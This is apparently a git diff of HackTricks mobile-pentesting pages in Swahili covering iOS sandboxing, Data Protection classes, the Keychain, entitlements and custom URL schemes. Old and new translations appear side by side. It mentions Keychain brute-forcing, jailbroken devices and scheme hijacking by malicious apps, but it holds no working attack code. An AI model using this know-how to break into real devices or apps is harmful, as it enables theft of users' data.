* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

139
mobile-pentesting/ios-pentesting/ios-basics.md
View file

@ -1,39 +1,40 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Utofautishaji wa Haki na Sanduku la Mchanga
# Utenganishaji wa Haki na Sandbox
Katika iOS, kuna tofauti katika haki kati ya programu zinazopatikana kwa mtumiaji na michakato muhimu ya mfumo. Programu zinaendeshwa chini ya kitambulisho cha mtumiaji **`mobile`**, wakati michakato muhimu ya mfumo inafanya kazi kama **`root`**. Tofauti hii inaboreshwa na kifaa cha sanduku la mchanga, ambacho kinaweka vizuizi vikali juu ya hatua ambazo programu zinaweza kuchukua. Kwa mfano, hata kama programu zinashiriki kitambulisho cha mtumiaji sawa, zinaruhusiwa kufikia au kubadilisha data ya programu nyingine.
Katika iOS, kuna tofauti katika haki kati ya programu zinazoweza kufikiwa na mtumiaji na michakato ya msingi ya mfumo. Programu zinaendesha chini ya utambulisho wa mtumiaji **`mobile`**, wakati michakato muhimu ya mfumo inafanya kazi kama **`root`**. Utenganishaji huu unaboreshwa na mekanizma ya sandbox, ambayo inatoa mipaka madhubuti juu ya vitendo ambavyo programu zinaweza kuchukua. Kwa mfano, hata kama programu zinashiriki utambulisho sawa wa mtumiaji, zinakatazwa kufikia au kubadilisha data za kila mmoja.
Programu zinafungwa katika saraka maalum (`private/var/mobile/Applications/{kitambulisho cha kubahatisha}`) na zina ufikiaji mdogo wa kusoma kwa maeneo na utendaji fulani wa mfumo, kama vile SMS na simu. Kufikia maeneo yaliyolindwa kunasababisha ombi la idhini ya mtumiaji.
Programu zinawekwa katika directory maalum (`private/var/mobile/Applications/{random ID}`) na zina upatikanaji wa kusoma uliozuiliwa kwa maeneo na kazi fulani za mfumo, kama vile SMS na simu. Upatikanaji wa maeneo yaliyolindwa unachochea ombi la kuruka kwa ruhusa ya mtumiaji.
# Ulinzi wa Data
iOS inatoa watumiaji wa maendeleo **API za Ulinzi wa Data**, zilizojengwa juu ya Kipuri cha Usalama (SEP) - kifaa maalum cha kushirikiana kwa shughuli za kryptografia na usimamizi wa funguo. SEP inahakikisha usalama wa data kupitia funguo maalum za kifaa, UID ya kifaa, iliyojumuishwa ndani yake.
iOS inatoa waendelezaji **Data Protection APIs**, iliyojengwa juu ya Secure Enclave Processor (SEP) — co-processor maalum kwa ajili ya operesheni za kificho na usimamizi wa funguo. SEP inahakikisha ulinzi wa data kwa njia ya funguo maalum za kifaa, UID ya kifaa, iliyojumuishwa ndani yake.
Wakati wa kuunda faili, funguo la kryptografia la AES la biti 256 lenye kipekee huzalishwa, likificha yaliyomo ya faili. Funguo hili la kryptografia, pamoja na kitambulisho cha darasa, kisha hufichwa kwa kutumia funguo la darasa na kuhifadhiwa ndani ya metadata ya faili. Kufichua faili kunahusisha kutumia funguo la mfumo kupata metadata, kupata funguo la darasa na kitambulisho cha darasa, na kisha kufichua funguo la kryptografia la faili.
Pale faili inapotengenezwa, funguo ya kipekee ya AES ya bit 256 inazalishwa, ikificha maudhui ya faili. Funguo hii ya kificho, pamoja na ID ya darasa, kisha inafichwa kwa kutumia funguo ya darasa na kuhifadhiwa ndani ya metadata ya faili. Kufichua faili kunahusisha kutumia funguo ya mfumo kufikia metadata, kupata funguo ya darasa na ID ya darasa, na kisha kufichua funguo ya kipekee ya kificho ya faili.
iOS inaainisha **darasa nne za ulinzi** kwa usalama wa data, ambazo zinaamua lini na jinsi data inaweza kupatikana:
iOS inaelezea **darasa nne za ulinzi** kwa ajili ya usalama wa data, ambazo zinatofautisha wakati na jinsi data inaweza kufikiwa:
- **Ulinzi Kamili (NSFileProtectionComplete)**: Data haiwezi kufikiwa hadi kifaa kifunguliwe kwa kutumia nambari ya siri ya mtumiaji.
- **Lindwa Isipokuwa Ikiwa Imefunguliwa (NSFileProtectionCompleteUnlessOpen)**: Inaruhusu ufikiaji wa faili hata baada ya kifaa kufungwa, ikiwa faili ilifunguliwa wakati kifaa kilipokuwa kimefunguliwa.
- **Lindwa Mpaka Kwanza Mtumiaji Aithibitishe (NSFileProtectionCompleteUntilFirstUserAuthentication)**: Data inapatikana baada ya kufungua mtumiaji wa kwanza baada ya kuanza, na inabaki kupatikana hata kama kifaa kinafungwa tena.
- **Hakuna Ulinzi (NSFileProtectionNone)**: Data inalindwa tu na UID ya kifaa, ikirahisisha kufuta haraka data kwa mbali.
- **Ulinzi Kamili (NSFileProtectionComplete)**: Data haiwezi kufikiwa mpaka kifaa kifunguliwe kwa kutumia nambari ya siri ya mtumiaji.
- **Ililindwa Isipokuwa Iwapo Imefunguliwa (NSFileProtectionCompleteUnlessOpen)**: Inaruhusu upatikanaji wa faili hata baada ya kifaa kufungwa, ikiwa faili ilifunguliwa wakati kifaa kilifunguliwa.
- **Ililindwa Hadi Uthibitisho wa Kwanza wa Mtumiaji (NSFileProtectionCompleteUntilFirstUserAuthentication)**: Data inapatikana baada ya uthibitisho wa kwanza wa mtumiaji baada ya kuanzisha, ikibaki inapatikana hata kama kifaa kimefungwa tena.
- **Hakuna Ulinzi (NSFileProtectionNone)**: Data inalindwa tu na UID ya kifaa, ikiruhusu kufuta data kwa haraka kwa mbali.
Ufichuzi wa darasa zote, isipokuwa `NSFileProtectionNone`, unahusisha funguo inayotokana na UID ya kifaa na nambari ya siri ya mtumiaji, ikihakikisha ufichuzi unawezekana tu kwenye kifaa chenye nambari ya siri sahihi. Tangu iOS 7, darasa la ulinzi la chaguo-msingi ni "Lindwa Mpaka Kwanza Mtumiaji Aithibitishe".
Fichuo la madarasa yote, isipokuwa `NSFileProtectionNone`, linahusisha funguo inayotokana na UID ya kifaa na nambari ya siri ya mtumiaji, kuhakikisha kwamba kufichua kunawezekana tu kwenye kifaa chenye nambari sahihi ya siri. Kuanzia iOS 7 na kuendelea, darasa la ulinzi la kawaida ni "Ililindwa Hadi Uthibitisho wa Kwanza wa Mtumiaji".
Watumiaji wa maendeleo wanaweza kutumia [**FileDP**](https://github.com/abjurato/FileDp-Source), chombo cha kuangalia darasa la ulinzi wa data ya faili kwenye iPhone.
Waendelezaji wanaweza kutumia [**FileDP**](https://github.com/abjurato/FileDp-Source), chombo cha kukagua darasa la ulinzi wa data wa faili kwenye iPhone.
```python
# Example code to use FileDP for checking file protection class
# Note: Ensure your device is jailbroken and has Python installed to use FileDP.
@ -44,44 +45,44 @@ python filedp.py /path/to/check
```
## **Keychain**
Katika iOS, **Keychain** inatumika kama **chombo kilichofichwa** na salama kwa kuhifadhi **taarifa nyeti**, inayopatikana tu na programu ambayo iliihifadhi au wale walio na idhini maalum. Ufichaji huu unalindwa na **nenosiri la kipekee lililotengenezwa na iOS**, ambalo lenyewe limefichwa kwa kutumia **AES**. Mchakato huu wa ufichaji unatumia kazi ya **PBKDF2**, ikichanganya kodi ya mtumiaji na chumvi iliyotokana na **UID** ya kifaa, sehemu ambayo chipseti ya **enclave salama** pekee inaweza kufikia. Kwa hivyo, hata kama kodi ya mtumiaji inajulikana, maudhui ya Keychain hayapatikani kwenye kifaa kingine chochote isipokuwa kile ambacho yalifichwa awali.
Katika iOS, **Keychain** inatumika kama **konteina salama iliyo na usimbuaji** kwa ajili ya kuhifadhi **taarifa nyeti**, inayopatikana tu na programu iliyohifadhi taarifa hizo au zile zilizoidhinishwa wazi. Usimbuaji huu unalindwa na **nenosiri la kipekee lililotengenezwa na iOS**, ambalo lenyewe limefichwa kwa **AES**. Mchakato huu wa usimbuaji unatumia **PBKDF2 function**, ukichanganya nambari ya siri ya mtumiaji na chumvi iliyotokana na **UID** ya kifaa, sehemu ambayo ni ya **secure enclave chipset** pekee inayoweza kufikiwa. Kwa hivyo, hata kama nambari ya siri ya mtumiaji inajulikana, maudhui ya Keychain yanabaki yasiyoweza kupatikana kwenye kifaa kingine chochote isipokuwa kile ambacho yalifichwa awali.
**Usimamizi na ufikiaji** wa data ya Keychain unashughulikiwa na **daemani ya `securityd`**, kulingana na idhini maalum za programu kama vile `Keychain-access-groups` na `application-identifier`.
**Usimamizi na ufikiaji** wa data za Keychain unashughulikiwa na **`securityd` daemon**, kulingana na haki maalum za programu kama `Keychain-access-groups` na `application-identifier`.
### **Operesheni za API ya Keychain**
### **Keychain API Operations**
API ya Keychain, iliyoelezewa kwa undani katika [nyaraka za Huduma za Keychain za Apple](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/02concepts/concepts.html), inatoa kazi muhimu za usimamizi wa uhifadhi salama:
Keychain API, iliyoelezwa katika [nyaraka za Keychain Services za Apple](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/02concepts/concepts.html), inatoa kazi muhimu za usimamizi wa hifadhi salama:
- **`SecItemAdd`**: Inaongeza kipengee kipya kwenye Keychain.
- **`SecItemUpdate`**: Inasasisha kipengee kilichopo kwenye Keychain.
- **`SecItemCopyMatching`**: Inapata kipengee kutoka kwenye Keychain.
- **`SecItemDelete`**: Inaondoa kipengee kutoka kwenye Keychain.
- **`SecItemAdd`**: Inaongeza kipengele kipya kwenye Keychain.
- **`SecItemUpdate`**: Inaweza kuboresha kipengele kilichopo kwenye Keychain.
- **`SecItemCopyMatching`**: Inapata kipengele kutoka kwenye Keychain.
- **`SecItemDelete`**: Inafuta kipengele kutoka kwenye Keychain.
Kuvunja nguvu ya nenosiri la Keychain kunahusisha kushambulia moja kwa moja ufunguo uliofichwa au kujaribu kuhadithi kodi ya mtumiaji kwenye kifaa yenyewe, ikizuiliwa sana na kucheleweshwa kwa enclave salama baada ya jaribio lisilofanikiwa.
Kujaribu kufungua nenosiri la Keychain kunahusisha ama kushambulia funguo zilizofichwa moja kwa moja au kujaribu kukisia nambari ya siri kwenye kifaa chenyewe, ambayo inakabiliwa kwa kiasi kikubwa na utekelezaji wa secure enclave wa kuchelewesha kati ya majaribio yasiyofanikiwa.
### **Kuweka Ulinzi wa Data ya Kipengee cha Keychain**
### **Configuring Keychain Item Data Protection**
Viwango vya ulinzi wa data kwenye vitu vya Keychain vinawekwa kwa kutumia sifa ya `kSecAttrAccessible` wakati wa kuunda au kusasisha kipengee. Viwango hivi, [kama ilivyoelezwa na Apple](https://developer.apple.com/documentation/security/keychain_services/keychain_items/item_attribute_keys_and_values#1679100), vinadhibiti wakati na jinsi vitu vya Keychain vinavyopatikana:
Viwango vya ulinzi wa data kwa vipengele vya Keychain vinakabiliwa kwa kutumia sifa ya `kSecAttrAccessible` wakati wa kuunda au kuboresha kipengele. Viwango hivi, [kama ilivyoainishwa na Apple](https://developer.apple.com/documentation/security/keychain_services/keychain_items/item_attribute_keys_and_values#1679100), vinatambulisha wakati na jinsi vipengele vya Keychain vinavyopatikana:
- **`kSecAttrAccessibleAlways`**: Vinapatikana wakati wowote, bila kujali hali ya kufunga kifaa.
- **`kSecAttrAccessibleAlwaysThisDeviceOnly`**: Vinapatikana wakati wowote, lakini havijumuishwi kwenye nakala za akiba.
- **`kSecAttrAccessibleAfterFirstUnlock`**: Vinapatikana baada ya kufungua kifaa mara ya kwanza baada ya kuanza upya.
- **`kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly`**: Sawa na hapo juu, lakini haviwezi kuhamishwa kwenye vifaa vipya.
- **`kSecAttrAccessibleWhenUnlocked`**: Vinapatikana tu wakati kifaa kimefunguliwa.
- **`kSecAttrAccessibleWhenUnlockedThisDeviceOnly`**: Vinapatikana wakati kimefunguliwa, lakini havijumuishwi kwenye nakala za akiba.
- **`kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly`**: Inahitaji kodi ya kifaa, lakini havijumuishwi kwenye nakala za akiba.
- **`kSecAttrAccessibleAlways`**: Inapatikana wakati wowote, bila kujali hali ya kufunga kifaa.
- **`kSecAttrAccessibleAlwaysThisDeviceOnly`**: Inapatikana kila wakati, lakini haijajumuishwa kwenye nakala za akiba.
- **`kSecAttrAccessibleAfterFirstUnlock`**: Inapatikana baada ya kufungua mara ya kwanza baada ya kuanzisha upya.
- **`kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly`**: Kama ilivyo hapo juu, lakini haiwezi kuhamishwa kwa vifaa vipya.
- **`kSecAttrAccessibleWhenUnlocked`**: Inapatikana tu wakati kifaa kimefunguliwa.
- **`kSecAttrAccessibleWhenUnlockedThisDeviceOnly`**: Inapatikana wakati kimefunguliwa, haijajumuishwa kwenye nakala za akiba.
- **`kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly`**: Inahitaji nambari ya siri ya kifaa, haijajumuishwa kwenye nakala za akiba.
**`AccessControlFlags`** inaboresha njia za ufikiaji, kuruhusu uwakilishi wa kibaiolojia au matumizi ya kodi ya mtumiaji.
**`AccessControlFlags`** zinaboresha zaidi mbinu za ufikiaji, kuruhusu uthibitisho wa kibaiolojia au matumizi ya nambari ya siri.
### **Onyo kuhusu Vifaa Vilivyofunguliwa**
### **Jailbroken Devices Warning**
{% hint style="warning" %}
Kwenye **vifaa vilivyofunguliwa**, ulinzi wa Keychain unakuwa hatarini, na kuweka hatari kubwa ya usalama.
Katika **vifaa vilivyovunjwa**, ulinzi wa Keychain umeharibiwa, na kuleta hatari kubwa ya usalama.
{% endhint %}
### **Uthabiti wa Data ya Keychain**
### **Persistence of Keychain Data**
Tofauti na data maalum ya programu ambayo inafutwa wakati programu inapoondolewa, **data ya Keychain inadumu** kwenye kifaa. Tabia hii inaweza kuwezesha wamiliki wapya wa kifaa cha mkono cha mtu wa zamani kupata data ya programu ya mmiliki wa awali kwa kusakinisha tena programu. Waendelezaji wanashauriwa kufuta data ya Keychain kwa kusudi kabla ya kusakinisha programu au wakati wa kujitolea ili kupunguza hatari hii. Hapa kuna mfano wa nambari ya Swift inayoonyesha jinsi ya kufuta data ya Keychain wakati wa uzinduzi wa kwanza wa programu:
Tofauti na data maalum za programu zinazofutwa wakati wa kufuta programu, **data za Keychain zinadumu** kwenye kifaa. Tabia hii inaweza kuwapa wamiliki wapya wa kifaa cha pili ufikiaji wa data za programu za mmiliki wa awali kwa kuanzisha upya programu. Wanakuza wanashauriwa kufuta data za Keychain kwa hiari wakati wa usakinishaji wa programu au wakati wa kutoka ili kupunguza hatari hii. Hapa kuna mfano wa msimbo wa Swift unaoonyesha jinsi ya kufuta data za Keychain wakati wa uzinduzi wa kwanza wa programu:
```swift
let userDefaults = UserDefaults.standard
@ -93,46 +94,47 @@ userDefaults.set(true, forKey: "hasRunBefore")
userDefaults.synchronize() // Forces the app to update UserDefaults
}
```
# **Uwezo wa Programu**
# **App Capabilities**
Katika uwanja wa maendeleo ya programu, **sandboxing** inacheza jukumu muhimu katika kuimarisha usalama. Mchakato huu huhakikisha kuwa kila programu inafanya kazi ndani ya saraka yake ya nyumbani ya kipekee, hivyo kuzuia upatikanaji wake kwa faili za mfumo au data inayomilikiwa na programu nyingine. Utekelezaji wa vizuizi hivi hufanywa kupitia sera za sandbox, ambazo ni sehemu ya **Trusted BSD (MAC) Mandatory Access Control Framework**.
Katika eneo la maendeleo ya programu, **sandboxing** ina jukumu muhimu katika kuimarisha usalama. Mchakato huu unahakikisha kwamba kila programu inafanya kazi ndani ya directory yake ya nyumbani, hivyo kuzuia kufikia faili za mfumo au data zinazomilikiwa na programu nyingine. Utekelezaji wa vizuizi hivi unafanywa kupitia sera za sandbox, ambazo ni sehemu ya **Trusted BSD (MAC) Mandatory Access Control Framework**.
Wabunifu wa programu wana uwezo wa kusanidi **uwezo au ruhusa** fulani kwa programu zao, kama vile **Data Protection** au **Keychain Sharing**. Ruhusa hizi zinafanywa mara moja baada ya programu kusakinishwa. Hata hivyo, ili kupata rasilimali zilizolindwa fulani, programu lazima ipate idhini wazi kutoka kwa mtumiaji wakati wa jaribio la kwanza. Hii inafanikiwa kupitia matumizi ya _purpose strings_ au _usage description strings_, ambazo hupewa watumiaji katika ombi la idhini.
Wakuu wa programu wana uwezo wa kuunda **uwezo au ruhusa** fulani kwa programu zao, kama vile **Data Protection** au **Keychain Sharing**. Ruhusa hizi zinatumika mara moja baada ya programu kufungwa. Hata hivyo, ili kufikia rasilimali fulani zilizolindwa, programu inapaswa kupata idhini wazi kutoka kwa mtumiaji wakati wa jaribio la kwanza. Hii inafanywa kupitia matumizi ya _purpose strings_ au _usage description strings_, ambazo zinawasilishwa kwa watumiaji katika arifa ya ombi la ruhusa.
Kwa wale walio na ufikiaji wa msimbo wa chanzo, uthibitisho wa ruhusa zilizojumuishwa katika faili ya `Info.plist` unaweza kufanywa kwa:
Kwa wale wenye ufikiaji wa msimbo wa chanzo, uthibitisho wa ruhusa zilizo katika faili ya `Info.plist` unaweza kufanywa kwa:
1. Kufungua mradi katika Xcode.
2. Kupata na kufungua faili ya `Info.plist`.
3. Kutafuta funguo zilizo na kipimo cha `"Privacy -"`, na chaguo la kuona funguo/thamani za asili kwa uwazi.
2. Kutafuta na kufungua faili ya `Info.plist`.
3. Kutafuta funguo zilizoanzishwa na `"Privacy -"`, ikiwa na chaguo la kuona funguo/thamani za asili kwa uwazi.
Wakati unashughulika na faili ya IPA, hatua zifuatazo zinaweza kufuatwa:
Wakati wa kushughulikia faili ya IPA, hatua zifuatazo zinaweza kufuatwa:
1. Kufungua faili ya IPA.
2. Kupata faili ya `Info.plist` ndani ya `Payload/<jina la programu>.app/`.
3. Geuza faili kuwa muundo wa XML ikiwa ni lazima, kwa ukaguzi rahisi.
1. Fungua faili la IPA.
2. Tafuta faili ya `Info.plist` ndani ya `Payload/<appname>.app/`.
3. Geuza faili kuwa katika muundo wa XML ikiwa ni lazima, kwa ajili ya ukaguzi rahisi.
Kwa mfano, _purpose strings_ katika faili ya `Info.plist` inaweza kuonekana kama ifuatavyo:
Kwa mfano, purpose strings katika faili ya `Info.plist` zinaweza kuonekana kama hii:
```xml
<plist version="1.0">
<dict>
<key>NSLocationWhenInUseUsageDescription</key>
<string>Your location is used to provide turn-by-turn directions to your destination.</string>
```
## Uwezo wa Kifaa
Faili ya `Info.plist` ya programu inaonyesha **uwezo wa kifaa** ambao husaidia Duka la App kuchuja programu kulingana na uwezo wa kifaa. Haya yamefafanuliwa chini ya ufunguo wa **`UIRequiredDeviceCapabilities`**. Kwa mfano:
## Device Capabilities
Faili la `Info.plist` la programu linaeleza **uwezo wa kifaa** ambao husaidia Duka la Programu kuchuja programu kwa ajili ya ulinganifu wa kifaa. Hizi zimefafanuliwa chini ya **`UIRequiredDeviceCapabilities`** ufunguo. Kwa mfano:
```xml
<key>UIRequiredDeviceCapabilities</key>
<array>
<string>armv7</string>
</array>
```
Mfano huu unaonyesha kuwa programu inalingana na seti ya maagizo ya armv7. Watengenezaji pia wanaweza kubainisha uwezo kama vile nfc ili kuhakikisha kuwa programu yao inapatikana tu kwenye vifaa vinavyounga mkono NFC.
This example indicates that the app is compatible with the armv7 instruction set. Developers may also specify capabilities like nfc to ensure their app is only available to devices supporting NFC.
## Haki za Matumizi
## Entitlements
**Haki za Matumizi** ni sehemu muhimu nyingine ya maendeleo ya programu za iOS, zikitumika kama jozi za thamani muhimu ambazo hutoa ruhusa kwa programu kutekeleza operesheni fulani zaidi ya ukaguzi wa wakati wa uendeshaji. Kwa mfano, kuwezesha **Ulinzi wa Data** katika programu kunahusisha kuongeza haki maalum katika mradi wa Xcode, ambayo kisha inaonyeshwa katika faili ya haki za programu au faili ya utoaji wa simu iliyowekwa kwa IPAs.
**Entitlements** ni kipengele kingine muhimu katika maendeleo ya programu za iOS, kinachofanya kazi kama jozi za funguo-thamani ambazo zinawapa programu ruhusa ya kufanya operesheni fulani zaidi ya ukaguzi wa wakati wa utekelezaji. Kwa mfano, kuwezesha **Data Protection** katika programu kunahusisha kuongeza ruhusa maalum katika mradi wa Xcode, ambayo kisha inaonyeshwa katika faili za ruhusa za programu au faili ya mkataba wa simu iliyojumuishwa kwa IPAs.
# Marejeo
# References
* [https://mas.owasp.org/MASTG/iOS/0x06d-Testing-Data-Storage](https://mas.owasp.org/MASTG/iOS/0x06d-Testing-Data-Storage)
* [https://github.com/OWASP/owasp-mastg/blob/master/Document/0x06h-Testing-Platform-Interaction.md](https://github.com/OWASP/owasp-mastg/blob/master/Document/0x06h-Testing-Platform-Interaction.md)
* [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/)
@ -140,16 +142,17 @@ Mfano huu unaonyesha kuwa programu inalingana na seti ya maagizo ya armv7. Waten
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

64
mobile-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md
View file

@ -1,28 +1,29 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
Hii ni muhtasari kutoka kwenye habari husika kutoka [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/)
Hii ni muhtasari kutoka kwa taarifa zinazohusiana na [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/)
## Taarifa Msingi
## Taarifa za Msingi
Mfumo wa URL maalum huruhusu programu kuwasiliana kwa kutumia itifaki maalum, kama ilivyoelezwa katika [Hati ya Maendeleo ya Apple](https://developer.apple.com/library/content/documentation/iPhone/Conceptual/iPhoneOSProgrammingGuide/Inter-AppCommunication/Inter-AppCommunication.html#//apple_ref/doc/uid/TP40007072-CH6-SW1). Itifaki hizi lazima zitangazwe na programu, ambayo kisha inashughulikia URL zinazoingia zifuatazo itifaki hizo. Ni muhimu kuhakikisha **uthibitisho wa vigezo vyote vya URL** na **kutupa URL zozote zisizo sahihi** ili kuzuia mashambulizi kupitia njia hii.
Mipango ya URL ya kawaida inaruhusu programu kuwasiliana kwa kutumia itifaki maalum, kama ilivyoelezwa katika [Apple Developer Documentation](https://developer.apple.com/library/content/documentation/iPhone/Conceptual/iPhoneOSProgrammingGuide/Inter-AppCommunication/Inter-AppCommunication.html#//apple_ref/doc/uid/TP40007072-CH6-SW1). Mipango hii lazima itangazwe na programu, ambayo kisha inashughulikia URL zinazokuja kufuata mipango hiyo. Ni muhimu **kuhakiki vigezo vyote vya URL** na **kukatisha URL zozote zisizo sahihi** ili kuzuia mashambulizi kupitia njia hii.
Mfano unatolewa ambapo URI `myapp://hostname?data=123876123` inaita hatua maalum ya programu. Kasoro iliyobainishwa ilikuwa katika programu ya Skype Mobile, ambayo iliruhusu hatua za simu zisizoruhusiwa kupitia itifaki ya `skype://`. Itifaki zilizosajiliwa zinaweza kupatikana katika `Info.plist` ya programu chini ya `CFBundleURLTypes`. Programu mbaya zinaweza kuitumia hii kwa kusajili upya URI ili kuiba habari nyeti.
